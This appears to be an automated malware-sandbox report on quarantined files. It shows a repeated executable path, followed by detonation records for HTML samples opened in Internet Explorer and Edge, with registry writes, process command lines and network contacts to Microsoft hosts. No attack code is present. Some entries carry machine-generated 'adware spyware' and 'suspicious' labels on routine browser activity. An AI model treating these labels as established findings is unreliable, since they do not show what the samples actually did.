C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

memory/1828-0-0x0000000074C3E000-0x0000000074C3F000-memory.dmp

memory/1828-1-0x0000000000BC0000-0x0000000000D30000-memory.dmp

memory/1828-2-0x0000000005BC0000-0x0000000006164000-memory.dmp

memory/1828-4-0x0000000074C30000-0x00000000753E0000-memory.dmp

memory/1828-5-0x0000000074C3E000-0x0000000074C3F000-memory.dmp

memory/1828-6-0x0000000074C30000-0x00000000753E0000-memory.dmp

memory/1828-7-0x00000000A28F0000-0x00000000A29F5000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20240903-en

Max time kernel

119s

Max time network

127s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\I8L5Xon.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e8e54c690312e54c93365f54cb640aa4000000000200000000001066000000010000200000004e36d0df472f3cc3dcdff2ae61d9246bbe9f8e59c709e62e2cec856786541363000000000e80000000020000200000008f2936b83b40480655840cc24535d2d1337dc4f11d8816d80c9c1fd4996b740f20000000615d8ce4bdf5506d7abb8485c731e2481d26d7a192ce031f3e58257c18c5d86440000000729a837446553543aa03018f2ae498f7bca432d31b6ed087416233e916ca558244ae517828fe1702923c557c4e8acec16b1f74d43fc2d41d13fcf48e0ef809d3 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 10ae02a9a888db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446775427" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D480BE11-F49B-11EF-82CE-E62D5E492327} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\I8L5Xon.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2340 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabD1E0.tmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

C:\Users\Admin\AppData\Local\Temp\TarD2D3.tmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Analysis: behavioral12

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

140s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\IxZcQMy.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1664 wrote to memory of 3352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2148 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 2828 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 4988 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\IxZcQMy.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff4b4346f8,0x7fff4b434708,0x7fff4b434718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2628 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 www.microsoft.com udp
GB 104.115.34.42:80 www.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

\??\pipe\LOCAL\crashpad_1664_UQHTBNDPYRKPYDOB

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Analysis: behavioral18

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20240903-en

Max time kernel

117s

Max time network

127s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\kablenet.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c01a77a9a888db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
